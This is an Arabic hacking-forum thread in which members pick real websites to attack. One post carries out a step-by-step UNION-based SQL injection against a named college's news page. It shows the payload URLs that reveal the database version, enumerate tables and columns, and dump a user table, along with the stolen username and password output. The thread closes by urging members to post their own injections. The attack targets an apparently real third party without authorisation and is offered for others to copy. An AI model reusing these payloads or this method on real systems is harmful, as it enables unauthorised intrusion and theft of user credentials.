غرفة حقن قواعد البيانات {غرفة Sql }

[kanvi]

اقتباس المشاركة الأصلية كتبت بواسطة Master vbspiders [align=center]تسلم ايدك على المعلومات مممم ياريت تكملها نريد الادمن منك مش من غيرك ^_^ خذ وقتك... وبالنسبة للبقية هذا هدف جديد لكن انا ما حقنتو انتم جربوه : كود PHP: http://www.mcny.edu/news/newsdetail.php?id=389%27  بالتوفيق تحياتي [/align]

تم حقن الهدف: الموقع بسيط

اصدر القاعدة

كود PHP:

http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,@@version,7,8,9,10,11,12-- 


5.0.91-community

استخرج اسم القاعدة:

كود PHP:

http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 


trackrsvp_user:password:audrey_mcnydb

استخراج الجداول:

كود PHP:

http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12+from information_schema.columns+where+table_name=0x747261636b727376705f75736572-- 


كود PHP:

trackrsvp_user:id:audrey_mcnydb,
trackrsvp_user:username:audrey_mcnydb,
trackrsvp_user:password:audrey_mcnydb,
trackrsvp_user:fname:audrey_mcnydb,
trackrsvp_user:lname:audrey_mcnydb 


الحقنة النهائية:

كود PHP:

http://www.mcny.edu/news/newsdetail.php?id=-389+union+SeleCt+1,2,3,4,5,group_concat(id,0x3a,username,0x3a,password,0x3a,fname,0x3a,lname),7,8,9,10,11,12+from+trackrsvp_user-- 


1:aoh:test2:Andy:Oh


ملاحظة بسيطة:

نرجو من كل عضو يقوم بالحقن موقع ان يضع مراحل عملية الحقن و ذكر المشكل التي تعرض لها لتعم الفائدة على جميع وحرصا على جملية الموضوع